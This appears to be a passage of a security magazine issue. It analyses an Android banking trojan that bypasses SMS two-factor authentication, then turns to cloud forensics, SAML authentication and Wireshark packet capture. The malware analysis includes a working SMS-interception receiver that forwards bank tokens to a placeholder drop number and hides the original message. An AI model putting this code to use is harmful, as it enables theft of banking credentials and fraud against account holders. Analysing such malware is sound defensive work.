However, today this system is hackable by malicious users. Trend Micro said: "The attack is designed to bypass a certain two-factor authentication scheme used by banks. In particular, it bypasses session tokens, which are frequently sent to users' mobile devices via Short Message Service (SMS). Users are expected to enter a session token to activate banking sessions so they can authenticate their identities. Since this token is sent through a separate channel, this method is generally considered secure".

This article is a real use case of this kind of malicious software. During our recent malware analysis targeting Italian financial institutions, we found a very powerful piece of malware that can bypass 2FA with a malicious app installed on the phone. Malware like this can drive the user to download a fake application onto their phone from the official Google Play Store, using a Man in the Browser (MITB) attack. Once on the user's PC, the attacker can take full control of the machine and interact with it through a Command and Control (C&C) server. What we explain in this article is a real active botnet with at least 40 compromised zombie hosts.
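To make the scheme under attack concrete, the sketch below shows in broad strokes how server-side SMS-based 2FA typically works. It is a minimal illustration under stated assumptions, not code from any bank; the SmsOtp class and the SmsGateway interface are hypothetical names introduced here.

import java.security.SecureRandom;
import java.time.Instant;

// Minimal sketch of server-side SMS 2FA; real deployments add rate
// limiting, retry caps and constant-time comparison.
public class SmsOtp {
    private final SecureRandom random = new SecureRandom();
    private String currentCode;
    private Instant expiresAt;

    // Generate a 6-digit session token and send it out of band via SMS.
    public void issue(String phoneNumber, SmsGateway gateway) {
        currentCode = String.format("%06d", random.nextInt(1_000_000));
        expiresAt = Instant.now().plusSeconds(120);
        gateway.send(phoneNumber, "Your banking code: " + currentCode);
    }

    // The token only proves possession of the phone; malware that
    // forwards the SMS, as described in this article, defeats the check.
    public boolean verify(String submitted) {
        return currentCode != null
                && Instant.now().isBefore(expiresAt)
                && currentCode.equals(submitted);
    }

    // Hypothetical abstraction over an SMS provider.
    public interface SmsGateway {
        void send(String to, String text);
    }
}

The security of the whole scheme rests on the assumption that only the legitimate user can read the SMS; the rest of the article shows how the malware breaks exactly that assumption.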

HOW THE 2FA IS BYPASSED
In recent times we have seen criminals developing more sophisticated solutions, backed by increasing knowledge of mobile and web programming. This scenario is growing throughout the entire world, though it is concentrated mostly in Europe. Criminals are developing solutions to bypass the 2FA used by 90% of banks, building "legal" applications published in the Google Play Store and Apple App Store. These applications can steal information on the phone, and intercept and send it over the network silently. The latest operation, named "Operation Emmental" and discovered by Trend Micro, acts in just this way. In this section, we will discover how a criminal can force a user to download and install the mobile application.

When malware infects the machine and the user navigates to the online banking platform, a MITB attack starts injecting JavaScript code inside the browser. This injection modifies some data in the page while keeping the same structure. During navigation, the hacked website will invite the user to download the fake application, explaining all the steps and asking them to insert their data into the bogus form. The app can be downloaded in two different ways:

SMS
By inserting your number in the fake form, you will receive an SMS with the download link from the store. Here is a screenshot of a received SMS. The fake app's name resembles many programs used to encrypt and share sensitive information; people trust this app because of the name.

Figure 1. SMS sent by attackers to download the APK

QR CODE
A QR code is shown via a MITB attack during navigation of the online banking website. Here, a screenshot of the image used to redirect the user to the Google Play Store.

Figure 2. QR code used to download the APK

A case of QR codes is reported by Trend Micro in the image below. When the user does not use the SMS or the link inside the web page, a QR code appears. Scanning it with any QR reader from the store, the user is redirected to the Google Play Store to download the app.

Figure 3.

Every single step is given by the attackers, as reported below:

STEP ONE
When the Google Play Store is opened, click on the "install" button and "Accept" the app authorization. Rights are requested to send, receive, and intercept SMS, and to read/write on the file system.

Figure 4.

Description provided by attackers:
• Secure sms transmission with asymmetric encryption, totaly automaticaly.
• Totaly secure sms.
• Private-key infrastructure (PKI).
• Comfortable and easy use, one time installation.
• This application is created to protect sensetive data received over sms.
• Even if the sms is intersepted nothing can be reached from the encrypted text.
• The encrypted text can only be decrypted by your personal private key, generated just after the first launch.
• Each key is unique and has its own identification number.

Functionality:
• A Keypair is created after first launch.
• A unique identification number is granted.
• With the Private Key you decrypt messages, received from the trusted saurses.
• Send your Private Key Identifiction Number to the organization which wants to send you an encrypted message. The organization encrypts the message with your Private Key and sends the encrypted message to you. ONLY YOU can decrypt the encrypted Message with your Private Key.

Instruction:
• Doqnload and install the app.
• Launch the aplication.
• Waint till your private kay is generated.
• Share your Private Key identification number.

The description is full of orthographic errors, which indicates that the authors are not from an English-speaking country.

Analyzing the APK and decompiling it, we found the rights requested by the malicious app:

<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

STEP TWO
Once installed, the app must be opened on the phone, where it shows a random number generator. The user needs to insert this number into the online banking account page to log in to the portal. Trend Micro says: "At this stage, the users have to enter the password that was 'generated' by the fake app. The app has a preset list of possible passwords and just randomly chooses one. The Web page, meanwhile, simply checks if one of those possible passwords was entered. Guessing numbers does not work; the users will not be able to proceed with the fake banking authentication."

Figure 5.

Installing the Android app allows the attackers to gain full control of the users' online banking sessions because, in reality, it intercepts the session tokens sent via SMS to users' phones, which are then forwarded to the cybercriminals. The spoofed website allows the attackers to obtain the users' login credentials, while the mobile app intercepts the real session tokens sent by the banks. As a result, the attackers obtain everything they need to fake a user's online banking transactions. The app waits for an SMS from the user's bank, which provides an OTP or a legitimate token (.tok). When these are received, the app hijacks the communication in the background and forwards the stolen data to a number in an encrypted SMS. Here is a decompiled piece of code used to test the availability of the server:

Settings.sendSms(this, new MessageItem("+39366134xxxx", "Hello are you there?"))

Communication starts with a simple SMS requesting service availability. When an SMS is received from a bank number, interception starts, and an encrypted SMS is sent containing the stolen information.
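For readers unfamiliar with how an Android app can hijack SMS in the background, the sketch below shows the general pattern such malware relies on: a broadcast receiver registered for incoming SMS that forwards message bodies before the victim sees them. This is a minimal illustration assuming the classic SMS_RECEIVED ordered broadcast on older Android versions; the class name and drop number are hypothetical, not taken from the decompiled sample.

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;

// Illustrative receiver pattern; the drop number is a placeholder.
public class SmsInterceptReceiver extends BroadcastReceiver {
    private static final String DROP_NUMBER = "+10000000000";

    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle bundle = intent.getExtras();
        if (bundle == null) return;
        Object[] pdus = (Object[]) bundle.get("pdus");
        if (pdus == null) return;
        for (Object pdu : pdus) {
            SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu);
            String body = sms.getMessageBody();
            // Forward anything that looks like a bank token to the C&C number.
            SmsManager.getDefault()
                    .sendTextMessage(DROP_NUMBER, null, body, null, null);
        }
        // On pre-KitKat ordered broadcasts this suppresses the message,
        // so the victim never sees the original SMS.
        abortBroadcast();
    }
}

In a manifest, such a receiver is registered with a high-priority intent filter for android.provider.Telephony.SMS_RECEIVED; together with the SEND_SMS/RECEIVE_SMS permissions shown above, this is exactly the kind of indicator an analyst looks for when reviewing a suspicious APK's AndroidManifest.xml.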

C&C CENTER FUNCTION DETAILS
During our code analysis we found a link to a JavaScript file used by the criminals during the injection process of the MITB attack. Going deeper into the obfuscated code, we found a link to a C&C server where the data is sent. Behind the front-end, which was password protected, we saw a custom control panel used to control the botnet. Every single bot is represented in a table and is controlled with the panel. The first screen you see behind the login panel is a statistics page with the number of compromised hosts.

Figure 6.

In the second one (Logs), there is all the information about the bots. Every single user is cataloged with these parameters:
• Used browser
• Last operation on that bot
• IP
• Login
• Password
• User
• Type (file, flash)
• PIN
• Action (request data login)

As you can see in the panel shown below, in the C&C server the attackers have everything they need to access an online banking website with stolen credentials. This panel is very powerful because it can send a request to the infected user to insert his credentials another time.

Figure 7.

Clicking on the icons on the right, it is possible to send the request to a bot.

Figure 8.

By analyzing every single bot it is possible to see more details about it, by clicking on the PIN. The third page is the JS page, used by the attacker to inject code inside the bot's browser. To enable the form, there is a hidden command, discovered through JavaScript code analysis of that page.

Figure 9.

The fourth section is the Jabber page, where an attacker can change his XMPP username and password, and the last page is dedicated to setting the password for this panel.

Figure 10.

Figure 11.

CONCLUSION
The platform used by this hacker is very powerful because it is not only a drop zone where data is sent; it is a real C&C server. The attackers can interact with the malware and send it commands to execute on the infected machine. This kind of methodology is growing every day, and the attackers have ever more sophisticated resources: Windows malware, a malicious Android app, a rogue DNS resolver server, a phishing web server with fake bank site pages, and a compromised C&C server. Banks that use this kind of authentication are exposing users to rogue apps. Today there are more secure ways to access an online banking portal, like card readers, TANs and multiple-factor authentication, but they are more sophisticated and slower. We want to move fast, without any problems or slowdowns. But is this good for our online bank accounts?

STATISTICS
The attack is alive and the number of hacked users is increasing every day. We have detected more than 40 hacked hosts and accounts so far.

REFERENCES
http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ABOUT THE AUTHORS
Davide Cioccia is a Security Consultant at Reply s.p.a – Communication Valley – Security Operations Center in Italy. MSc in Computer Engineering, with a Master's thesis about a new way to combat the Advanced Persistent Threat, and a Microsoft Certified Professional (MCP, MS), he has written many articles about financial cybercrime, botnets, drop zones and APTs. Key assignments include anti-fraud management, anti-phishing services for financial institutions, drop zone and malware analysis, and cyber intelligence platform development.
E-Mail: [email protected]
Twitter: https://twitter.com/david107
LinkedIn: https://www.linkedin.com/in/davidecioccia

Senad Aruch. Multiple Certified ISMS Professional with a 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analysis, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security.
E-Mail: [email protected]
Blog: www.senadaruc.com
Twitter: https://twitter.com/senadaruch
LinkedIn: https://www.linkedin.com/in/senadaruc

AN OVERVIEW OF CLOUD FORENSICS
by Dejan Lukan

When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed by physical or virtual hardware. In recent years, there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

There are many benefits of virtualized servers, which we won't go into now, but the most prominent ones are definitely low cost, ease of use, and the ability to move them around in seconds without service downtime. Basically, cloud computing is just a fancy term created by marketing people, but we've all been using it for years. A good example of cloud computing is an email service where we don't have to install an email client on our local computer to access our new email and which serves as storage for all email. Instead, everything is already done by the cloud: the email messages are stored in the cloud and, even if we switch to a different computer, we only need to log in with our web browser and everything is there. Therefore, we only need an interface with which we can access our cloud application, which in the previous example is simply a web browser. Cloud computing has many benefits, but the two most distinct disadvantages are definitely security and privacy. Since we store all data in our cloud somewhere on the Internet, the cloud provider has access to our data, and so does an attacker if a breach occurs in the provider's network.

Network forensic analysis is part of the digital forensics branch, which monitors and analyzes computer network traffic for the purposes of gathering information, collecting legal evidence, or detecting intrusions [1]. When talking about network forensics, we're actually talking about the data that has been transmitted over the network, which might serve as the only evidence of an intrusion or malicious activity. Obviously that's not always the case, since an intruder often leaves evidence on the hard disk of the

compromised host as well, in the form of log files, uploaded malicious files, etc. But when the attacker is very careful not to leave any traces on the compromised computer, the only evidence that we might have is in the form of captured network traffic. When capturing network traffic, we most often want to separate the good data from the bad by extracting useful information from the traffic, such as transmitted files, communication messages, credentials, etc. If we have a lot of disk space available, we can also store all the traffic to disk and analyze it at a later time if needed, but obviously this requires a great amount of disk space. Usually we use network forensics to discover security attacks being conducted over the network. We can use a tool like tcpdump or Wireshark to perform network analysis on the network traffic.

CLOUD COMPUTING
Let's talk a little bit about deployment models of cloud computing, which are described below (summarized after [2]):

• Private cloud – The services of a private cloud are used only by a single organization and are not exposed to the public. A private cloud is hosted inside the organization and is behind a firewall, so the organization has full control over who has access to the cloud infrastructure. The virtual machines are then still assigned to a limited number of users.
• Public cloud – The services of a public cloud are exposed to the public and can be used by anyone. Usually the cloud provider offers a virtualized server with an assigned IP address to the customer. An example of a public cloud is Amazon Web Services (AWS).
• Community cloud – The services of a community cloud are used by several organizations to lower the costs, as compared to a private cloud.
• Hybrid cloud – The services of a hybrid cloud can be distributed across multiple cloud types. An example of such a deployment is when sensitive information is kept in private cloud services by an internal application. That application is then connected to an application on a public cloud to extend the application functionality.
• Distributed cloud – The services of a distributed cloud are distributed among several machines at different locations but connected to the same network.

The service models of cloud computing are the following (summarized after [2]):

• IaaS (infrastructure as a service) provides the entire infrastructure, including physical/virtual machines, firewalls, load balancers, hypervisors, etc. When using IaaS, we're basically outsourcing a complete traditional IT environment: we're renting a complete computer infrastructure that can be used as a service over the Internet.
• PaaS (platform as a service) provides a platform such as an operating system, database, web server, etc. We're renting a platform or an operating system from the cloud provider.
• SaaS (software as a service) provides access to the service, but you don't have to manage it, because that's done by the service provider. When using SaaS, we're basically renting the right to use an application over the Internet.

There are also other service models that we might encounter:

• Desktop as a service – We're connecting to a desktop operating system over the Internet, which enables us to use it from anywhere. It's also not affected if our own physical laptop gets stolen, because we can still use it.
• Storage as a service – We're using storage that physically exists on the Internet as if it were present locally.
This is very often used in cloud computing and is the primary basis of a NAS (network-attached storage) system.
• Database as a service – Here we're using a database service installed in the cloud as if it were installed locally. One great benefit of using database as a service is that we can use highly configurable and scalable databases with ease.
• Information as a service – We can access any data in the cloud by using the defined API as if it were present locally.
• Security as a service – This enables the use of security services as if they were implemented locally.

There are other services that exist in the cloud, but we've presented just the most widespread ones that are used on a daily basis.

If we want to start using the cloud, we need to determine which service model we want to use. The decision largely depends on what we want to deploy to the cloud. If we would like to deploy a simple web application, we might want to choose a SaaS solution, where everything will be managed by the service provider and we only have to worry about writing the application code. An example of this is writing an application that can run on Heroku.

We can think of the service models in terms of layers, where IaaS is the bottom layer, which gives us the most access to customize most of the needed infrastructure. PaaS is the middle layer, which automates certain things but is less configurable. The top layer is SaaS, which offers the least configuration but automates a large part of the infrastructure that we need when deploying an application.

CLOUD NETWORK FORENSICS
The first thing that we need to talk about is defining why cloud network forensics is even necessary. The answer to that is rather simple: because of attackers trying to hack our cloud services. We need to be notified when hackers are trying to gain access to our cloud infrastructure, platform, or service. Let's look at an example. Let's imagine that company X is running a service Y in the cloud; the service is very important and has to be available 24/7. If the service is down for a few hours, it could mean a considerable financial loss for company X. When such an attack occurs, company X must hire a cloud forensics expert to analyze the available information. The forensic analyst must look through all the logs on the compromised service to look for forensic evidence. The analyst soon discovers that the attack was conducted from the cloud provider's network, so he asks the cloud provider to give him the logs that he needs. At this point, we must evaluate what logs the forensic investigator needs in order to find out who was behind the attack.

This is where cloud network forensics comes into play. Basically, we need to take the digital forensics process and apply it to the cloud, where we need to analyze the information we have about filesystems, processes, registry, network traffic, etc. When collecting the information that we can analyze, we must know which service model is in use, because collecting the right information depends on it. When using different service models, we can access different types of information, as shown in the table below [3,4]. If we need additional information from the service model that we're using that is not specified in the table below, we need to contact the cloud service provider and they can send us the required information. The first column of the table contains the different layers that we might have access to when using cloud services. The SaaS, PaaS, and IaaS columns show the access rights we have when using the various service models, and the last column presents the information we have available when using a local computer that we have physical access to.

Information      SaaS  PaaS  IaaS  Local
Networking        –     –     –     ✓
Storage           –     –     –     ✓
Servers           –     –     –     ✓
Virtualization    –     –     –     ✓
OS                –     –     ✓     ✓
Middleware        –     –     ✓     ✓
Runtime           –     –     ✓     ✓
Data              –     ✓     ✓     ✓
Application       –     ✓     ✓     ✓
Access Control    ✓     ✓     ✓     ✓

It's evident from the table that, when using a local computer, we have maximum access, which is why the analysis of a local machine is the most complete. I intentionally didn't use the term "easiest," because that's not true: when we have maximum access to the computer, there are many pieces of evidence that we can collect and analyze.
The problem with cloud services is that the evidence needs to be provided by the CSP (cloud service provider): if we want to get application logs, database logs, or network logs

when using the SaaS service model, we need to contact the service provider in order to get them, because we can't access them by ourselves. Another problem is that a user's data is kept together with the data of other users on the same storage system, so it's hard to separate just the data that we need to conduct an analysis. If two users are using the same web server for hosting a web page, how can we prove that the server's log contains the data of the user that we're after? This is quite a problem when doing a forensic analysis of a cloud service. Let's describe every entry from the table above, so it will make more sense.

• Networking – In a local environment, we have access to the network machines, such as switches, routers, IDS/IPS systems, etc. We can access all of the traffic passing through the network and analyze it as part of gathering as much data as we possibly can. When using the cloud, even the CSP doesn't have that kind of data, because it must not log all the traffic passing through the network: users' data is confidential, and the CSP can't record, store, and analyze it. The CSP might only apply an IDS/IPS solution to the network, which analyzes traffic for malicious behavior and alerts the provider of such activity.
• Storage – When we have hardware access to the machine, we know exactly where the data is located but, when using a cloud service, the data could be anywhere, even in different states, countries, or even continents.
• Servers – In a traditional system, we have physical access to the machine, which is why we can actually go to the machine and analyze the data on it; all the data is local to the machine. This isn't possible when using the cloud, because the data is dispersed through multiple data centers and it's hard to confirm that we've actually collected all the needed data.
• Virtualization – In a local environment, we have access to the virtualization environment, where we can access the hypervisor and manage, delete, or create virtual machines. In the public cloud, we normally don't have access to the hypervisor, but if we absolutely must have access, we can run a private cloud.
• OS – In a local environment, we have complete access to the operating system, as we do in the IaaS model, but not in the PaaS and SaaS models. If we want access to the operating system, we could connect to the SSH service running on the server and issue OS commands, which we can't do when using Heroku, for example.
• Middleware – The middleware connects two separate endpoints, which together form a whole application. For example, we might have a database running on a backend system and the web application connects to that database by using different techniques.
• Runtime – When using the IaaS model, we can influence how the application is started and stopped, so we have access to its runtime.
• Data/application – In the PaaS and IaaS models, we have access to all of the data and applications, which we can manage by using search, delete, add, etc. We can't do that directly when using the SaaS model.
• Access control – In all service models, we have access to access control because, without it, we wouldn't have been able to access the service. We can control how access is granted to different users of the application.

When conducting forensic analysis in the traditional way, we can simply hire a forensics expert to collect all the data and analyze it from the local machine.
In a cloud service, we can do the same, but we must also cooperate with the cloud service provider, which might not have forensics experts available or simply might not care and therefore won't provide us with all the data that we need.

CONCLUSION
In this article, we've seen that, when conducting a cloud network forensic analysis, we do not have access to the same information as we do when conducting an analysis of a normal local computer system. We often do not have access to the information that we're after and must ask the cloud service provider to furnish the information we need. The problem with such data is that we must trust the cloud service provider to give us the right information; they might give us false information or hold back some very important information. This is just another problem when trying to use the data in court, because we must prove beyond doubt that the evidence from the collected data belongs to the user; the process of collecting the data, preserving it, and analyzing it must be documented and acceptable in a court of law.

When an attack has occurred on a cloud service, there are a lot of different problems we need to address, but the most important of them is communication with our cloud service provider. Because the services are located in the cloud, there is a lot of information that could serve as evidence which can only be provided by the CSP, since only the cloud provider has access to it. There are also other problems with gathering the data when working with cloud environments, such as data being located in multiple data centers around the globe, data of different users being located on the same storage device, etc.

There is still a lot of research that must be done in order to improve forensic examination of cloud services. There is also a lack of professional cloud forensics experts, though their numbers are expected to increase in the next couple of years.

REFERENCES
[1] Gary Palmer, A Road Map for Digital Forensic Research, Report from DFRWS 2001, First Digital Forensic Research Workshop, Utica, New York, August 7–8, 2001, Page(s) 27–30.
[2] Cloud computing, Wikipedia, https://en.wikipedia.org/wiki/Cloud_computing.
[3] Shams Zawoad and Ragib Hasan, Digital Forensics in the Cloud, University of Alabama at Birmingham.
[4] Aaron Bryson, Great Pen Test Coverage: Too Close For Missiles, Switching to Bullets, Pentest Magazine, Vol. 1, No. 4, Issue 04/2011(04), August.

ABOUT THE AUTHOR
Dejan Lukan is a security researcher for InfoSec Institute and a penetration tester from Slovenia. He is very interested in finding new bugs in real-world software products with source code analysis, fuzzing and reverse engineering. He also has a great passion for developing his own simple scripts for security-related problems and learning about new hacking techniques. He knows a great deal about programming languages, as he can write in a couple dozen of them.

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY
by David Hald, co-founder, chief relation officer

The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. This convenience has made cloud services incredibly popular, both to businesses and to malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical.

According to Javelin Strategy & Research's 2014 Identity Fraud Study, a new identity fraud victim was hit every two seconds in America last year, an increase of over half a million people since 2012. Despite the rise in identity and data theft, many authentication methods still rely on usernames and passwords to protect employees, customers and data. Today's cybercriminals are increasingly sophisticated in their attacks, and yesterday's authentication methods are simply inadequate.

SECURITY NEEDS HAVE CHANGED
Organizations are granting access to cloud-based business solutions such as Microsoft Office 365, Salesforce and Google Apps to an increasing number of end-users. Some cloud solutions offer generic security measures for authenticating users who access these systems in the cloud. This approach gives the end-user the responsibility of choosing what type of security to use and forces the user to rely on personal judgment to determine whether the security is strong enough to protect access effectively.

It has become increasingly obvious that usernames and passwords are ineffective ways of authenticating access, yet their use is still widespread as users balk at more cumbersome forms of authentication like tokens and certificates. While simple usernames and passwords are no longer effective, the amount of data stored in the cloud continues to escalate. Cloud providers must accommodate access for millions of users from all over the world. A centralized breach in a cloud-based solution would pose a serious risk to the data of thousands – if not more – of organizations. Therefore, end-users should select cloud providers that offer strong, flexible security that is extremely hard to compromise yet easy to use.

A CENTRALIZED SECURITY APPROACH
In light of the increasing need for stronger security for cloud access, businesses have begun to implement standards for authenticating users. One of the major problems organizations face is how to manage user identities in the cloud. To manage cloud identities, IT departments must often maintain an additional set of user credentials for each and every cloud solution used by their employees. This approach requires cumbersome procedures and extra work for IT. To bypass this problem, IT should use a centralized method that gives each user a single identity that provides access to a variety of different cloud solutions.

A centralized method like this ensures that those who access an organization's assets have been prequalified. It provides strong authentication while also freeing end-users from being dependent on specific software, hardware or features, for greater flexibility and convenience.

SAVING TIME WITH SAML
With the ability to allow secure Web domains to exchange user authentication and authorization data, Security Assertion Markup Language, or SAML, is one way to provide effective and easy identity management in the cloud. A SAML setup requires three roles: the end-user, the service provider and the identity provider. The service provider role is held by cloud solutions, such as Microsoft Office 365, Salesforce or Google Apps. The identity provider handles user authentication and identity management for the service provider, and can be used as a centralized system to handle authentication and identity management for multiple service providers at once. By using a SAML identity provider, organizations can gain all the recognized benefits that are traditionally associated with on-premise authentication solutions.

SAML frees organizations from having to maintain multiple instances of user credentials, one in the local area network (LAN) and several in the cloud. In this way, SAML is a time saver: the organization can keep its authentication and security mechanisms the same for all users, regardless of whether they are accessing data in the cloud or on the LAN, thus saving time and money while boosting security.

MAKE SECURE AUTHENTICATION YOUR GOAL
Cloud services offer convenient remote access to organizations, but they can also open the door to identity theft if the cloud security system relies on outdated methods such as usernames and passwords. The threat is real, and growing, so organizations must scrutinize the security that a cloud provider offers before closing a deal and make secure, authenticated cloud access for end-users their goal, regardless of whether it's offered by the cloud provider. For their part, cloud providers must make it their goal to create a secure and easy-to-use authentication method.
The stakes are too high not to.

ABOUT THE AUTHOR
David Hald is a founding member of SMS PASSCODE A/S, where he acts as a liaison and a promoter of the award-winning SMS PASSCODE multi-factor authentication solutions. Prior to founding SMS PASSCODE A/S, he was a co-founder and CEO of Conecto A/S, a leading consulting company within the area of mobile and security solutions, with special emphasis on Citrix, BlackBerry and other advanced mobile solutions. In Conecto A/S David has worked with strategic and tactical implementation in many large IT projects. David has also been CTO in companies funded by Teknologisk Innovation and Vækstfonden. Prior to founding Conecto, he worked as a software developer and project manager, and headed up his own software consulting company. David has a technical background from the Computer Science Institute of Copenhagen University (DIKU).

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS
by Eric A. Vanderburg

Almost every computer today is connected, and its communication with others takes the form of packets, which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring the activity that is performed over the network. The information from packet sniffing can be used to analyze the data packets and uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file will be generated at the end of every operation performed by the packet sniffer, and the log file will contain the information related to the packets.

Every packet has a header and a body, where the header contains information about the source of the packet and the body contains the actual information about the transfer. There are packet sniffer tools available online, and many of them are open source tools, available free of cost. How, when and where should packet capture be performed to collect the best data in a defensible manner? Attend this workshop to find out.

WHAT IS PACKET ANALYSIS?
Investigations cannot always be contained to a single computer, especially with the way systems are connected these days. Right now, your computer may be connected to dozens of different computers, some to check for software updates, others to gather tweets, email, or RSS feeds. Some connections could be used to authenticate to a domain or access network resources. Now consider an investigation and the potential importance this information could have to it.

Network communication over an Internet Protocol (IP) network can best be understood as a set of packets that form a communication stream. A machine may send and receive thousands of packets per minute, and computer networks are used to send these packets to their destination. Packet capture tools can be used to analyze this communication to determine how a computer or user interacted with other devices on the network. Packet analysis can capture these packets so that they can be reviewed to determine what communication took place.

Packet analysis is also called packet sniffing or protocol analysis. A tool that is used for packet analysis is called a packet sniffer or packet capture tool. It captures raw data across the wire, which helps in analyzing which parties are communicating on the network, what data is flowing, how much data is being transmitted and what network services are in use.

PACKET SNIFFING PROCESS
Packet sniffing can be divided into three steps. The first step is collection, when the software gathers all data traversing the network card it is bound to. Next, the data is converted to a form that the program can read and, lastly, the program presents the data to be analyzed and can perform pre-programmed analysis techniques on the data.

OSI NETWORK MODEL
Before you can analyze packets, you need to understand how network communication takes place. The OSI network model is a conceptual framework that describes the activities performed to communicate on a network.

TOOLS
There are various packet sniffing tools available on the market. Some popular packet capture tools include Wireshark, Network Miner and NetWitness Investigator, which we will see in detail. All three of these tools are free to download and use, and they can be operated in both command-line format and GUI format.

Of the three, Wireshark is the most popular packet sniffer, used worldwide for its ease of installation and use. More importantly, it is an open source tool that is available free of cost. The tool also provides advanced options that enable a forensic investigator or network administrator to delve deep into the packets and capture information. It supports numerous operating systems, protocols and media types.

There are numerous packet sniffer tools available for network administrators to analyze and understand the traffic flow across the network. It is always difficult to zero in on the best of the lot, as almost all of them perform the required functions seamlessly. Still, there are factors by which they can be ranked and classified as the top packet sniffing tools. The following three tools are identified as the best on the market, already serving millions of computers by identifying serious threats. Let's get into detail with each of the three packet sniffing tools and understand why they are ranked in this order.

WIRESHARK
Wireshark is a popular open source packet sniffer that performs functions such as network troubleshooting, data analysis, protocol development, etc. The tool uses the latest available platforms and user interface toolkits: the development version of Wireshark uses Qt, while the current releases use the GTK+ toolkit. The major advantage of using Wireshark is that it supports multiple platforms, operating systems and protocols. Wireshark comes in both graphical user interface format and command-line format.
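Before digging into Wireshark's interface, here is a rough sketch of the collection, conversion and analysis steps described above, expressed in a few lines of Python with the scapy library. This is an illustrative aside only (scapy is an assumption on my part and is not part of Wireshark); it needs administrator privileges to run.

```python
# A minimal collection -> conversion -> analysis cycle with scapy.
from collections import Counter
from scapy.all import sniff, IP

# Collection: gather 20 packets from the default interface (needs admin rights).
packets = sniff(count=20)

# Conversion: scapy has already dissected the raw bytes into named protocol
# layers, so each packet can be read as structured fields instead of raw hex.
# Analysis: a simple tally of which hosts are talking to which.
talkers = Counter((p[IP].src, p[IP].dst) for p in packets if IP in p)
for (src, dst), count in talkers.most_common(5):
    print(f"{src} -> {dst}: {count} packets")
```

Wireshark performs these same three steps at far greater depth, as we will see next.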
Wireshark works with network interface controllers to make it possible for the traffic flowing across the network to be captured as packets; otherwise, only data routed to a specific destination will be captured. Wireshark supports various protocols and media types. The approximate number of protocols supported by Wireshark is more than 900, and this count keeps increasing as and when an update is released. The primary reason for the increase in the count of supported protocols is the open source nature of the tool. Developers have the freedom to write code to include their new protocol in Wireshark. The Wireshark development team reviews the code that you send and includes it in the tool.

This is how it becomes possible for new protocols to be supported by Wireshark. Also, Wireshark supports major operating systems, ranging from Windows and macOS to Linux-based operating systems.

The other major reason for Wireshark to remain on top of a user's list of best packet sniffers is its ease of use. The graphical user interface of the tool is one of the simplest and easiest available. The menus are clear, with a simple layout, and raw data are represented graphically. This makes it easier for novices to get along with the tool in the early stages of their career.

The common problem that users face when using open source software is a lack of proper support. Wireshark has a highly active user community that can be ranked as the best among open source projects. The development team also provides email subscriptions that keep users up to date on the latest updates and FAQs.

Wireshark is very easy to install, and the required system configuration is minimal as well. Wireshark requires a minimum of 400 MHz of processor speed and 60 MB of free storage. The system should have the WinPcap capture driver and a network interface card that supports promiscuous mode, and this requires the user to have administrator access on the system being used. Once you are sure that your system has the given configuration, you can install the tool in a very short time. Since there will be no data the first time you open Wireshark, it will not be easy to judge the user interface right away.

Installing the Wireshark tool is as simple as installing other software on a Windows system. All you need to do is double-click the executable file for the installer to open up. Agree to the terms and conditions and select the components you need to be installed along with the packet sniffing tool. Certain components are selected by default, and they are enough for basic operations. Ensure that you select the Install WinPcap option and verify that the WinPcap installation window is displayed some time after the main Wireshark installation has started.

When the installation is complete, open the tool, select the Capture button from the main drop-down menu and select the interfaces from which you need data to be captured. This will initiate your first data capture using Wireshark, and the main window will then be filled with data that can be used by the user.

Figure 1. Home Window of Wireshark
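If you prefer to script that first capture instead of clicking through the GUI, a rough equivalent in Python with the scapy library (again an assumption on my part, not part of Wireshark) might look like the sketch below; the interface name "eth0" is a placeholder for your own.

```python
# Scripted equivalent of a first capture; needs administrator privileges.
from scapy.all import sniff, wrpcap

packets = sniff(iface="eth0", count=50)   # "eth0" is a placeholder interface
packets.summary()                         # one-line view of each packet
wrpcap("first_capture.pcap", packets)     # open this file in Wireshark later
```

The resulting pcap file can be opened directly in Wireshark for the deeper pane-by-pane analysis described next.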

Figure 2. Selecting Interfaces

The main window of Wireshark is where the collected data is presented to the forensic investigator or network administrator. Hence, this is the place where most of the time in the tool will be spent. The main window is broken down into three panes that are interlinked with each other.

The three panes are the packet list pane, the packet details pane and the packet bytes pane. The packet list displays the packets that are available for analysis. On selecting a packet, the corresponding packet details are displayed in the packet details pane, and the corresponding bytes of the packet are displayed in the packet bytes pane. The packet list pane displays the packet number and the time at which the packet was captured by the tool. It also displays the source and destination of the packet and other information related to the packet, such as the packet protocol. The packet bytes pane displays the raw data in the same form as it was originally captured and is of limited direct use. More information about Wireshark can be found at https://www.wireshark.org/. The tool can also be downloaded from the site.

Figure 3. Main Window

NETWORK MINER
Network Miner is a packet analysis tool that also includes the ability to perform packet sniffing. It is available for Windows, Linux and Mac OS. It is a passive packet capturing tool that detects operating systems, traffic, and network ports. By contrast, Wireshark is an active packet capturing tool.

